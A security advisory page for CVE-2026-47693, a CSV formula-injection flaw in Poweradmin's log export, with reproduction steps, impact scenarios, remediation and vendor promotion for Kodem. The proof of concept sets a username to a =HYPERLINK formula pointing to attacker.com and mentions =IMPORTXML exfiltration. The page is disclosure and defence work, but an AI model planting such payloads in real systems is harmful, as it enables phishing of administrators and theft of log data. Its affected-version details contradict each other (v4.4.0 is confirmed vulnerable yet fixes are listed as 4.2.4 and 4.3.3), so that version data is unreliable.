Summary
Description:
Poweradmin v4.4.0 is vulnerable to CSV Injection (Formula Injection) in its log export functionality. User-controlled data, specifically the username field, is written to exported CSV files without sanitizing formula trigger characters (=, +, -, @). When an administrator exports activity logs and opens the resulting CSV in a spreadsheet application (Microsoft Excel, LibreOffice Calc, Google Sheets), any formula stored in a username is executed by the application. This can be used for phishing attacks against administrators or data exfiltration.
Details
The vulnerability exists in all four log export controllers:
lib/Application/Controller/ListLogUsersController.php(lines 188, 194)lib/Application/Controller/ListLogZonesController.phplib/Application/Controller/ListLogGroupsController.phplib/Application/Controller/ListLogApiController.php
These controllers export database rows via fputcsv() without applying any formula injection countermeasures. The user column contains the username of the actor who performed the operation, and the username column (in user logs) contains the username of the affected account. Both fields are written verbatim to the CSV output.
A username such as =1+1 is written without CSV enclosure quotes (because it contains no commas or quotes), so spreadsheet applications treat it directly as a formula. A username containing commas or quotes (e.g. =HYPERLINK("http://attacker.com","Click here")) is enclosed in CSV quotes with internal quotes doubled, but spreadsheet applications still evaluate the cell value as a formula since it begins with =.
Additionally, PHP deprecation warnings are emitted directly into the HTTP response body before CSV headers, exposing internal file paths (e.g. /app/lib/Application/Controller/ListLogUsersController.php), a secondary information disclosure issue (CWE-209). This also corrupts the CSV file when PHP error reporting is enabled.
PoC
Prerequisites: An account with user_add_new permission (administrator role).
Steps to reproduce:
- Log in as administrator.
- Navigate to Add User and create an account with:
- Username:
=HYPERLINK("http://attacker.com","Confirm Identity") - Any valid email and password
- Username:
- Log out, then log in with the newly created account to generate a log entry.
- Log back in as administrator.
- Navigate to
/users/logsand click Export CSV. - Open the downloaded CSV file in Microsoft Excel or LibreOffice Calc.
Result: Excel renders a clickable hyperlink labeled "Confirm Identity" pointing to http://attacker.com in the user column of the log entry. With the simpler username =1+1, the cell displays 2 instead of the literal text, confirming formula execution.
Confirmed on Poweradmin v4.4.0 (Docker image poweradmin/poweradmin:latest).
Impact
This is a CSV Injection vulnerability (CWE-1236). It affects any administrator who exports activity logs to CSV and opens the file in a spreadsheet application.
Attack scenarios:
- Phishing: A malicious actor with the ability to create user accounts sets a formula username that renders as a convincing link in the exported report, tricking a higher-privileged administrator into clicking it.
- Data exfiltration: Using
=IMPORTXML()in Google Sheets or similar, adjacent cell data (log contents) can be sent to an attacker-controlled server silently when the sheet is opened.
CVE-2026-47693 has a CVSS score of 6.9 (Medium). The vector is network-reachable, high privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (4.2.4, 4.3.3); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
poweradmin/poweradmin to 4.2.4 or later; poweradmin/poweradmin to 4.3.3 or later
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-47693? CVE-2026-47693 is a medium-severity security vulnerability in poweradmin/poweradmin (composer), affecting versions < 4.2.4. It is fixed in 4.2.4, 4.3.3.
- How severe is CVE-2026-47693? CVE-2026-47693 has a CVSS score of 6.9 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of poweradmin/poweradmin are affected by CVE-2026-47693? poweradmin/poweradmin (composer) versions < 4.2.4 is affected.
- Is there a fix for CVE-2026-47693? Yes. CVE-2026-47693 is fixed in 4.2.4, 4.3.3. Upgrade to this version or later.
- Is CVE-2026-47693 exploitable, and should I be worried? Whether CVE-2026-47693 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-47693 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-47693?
- Upgrade
poweradmin/poweradminto 4.2.4 or later - Upgrade
poweradmin/poweradminto 4.3.3 or later
- Upgrade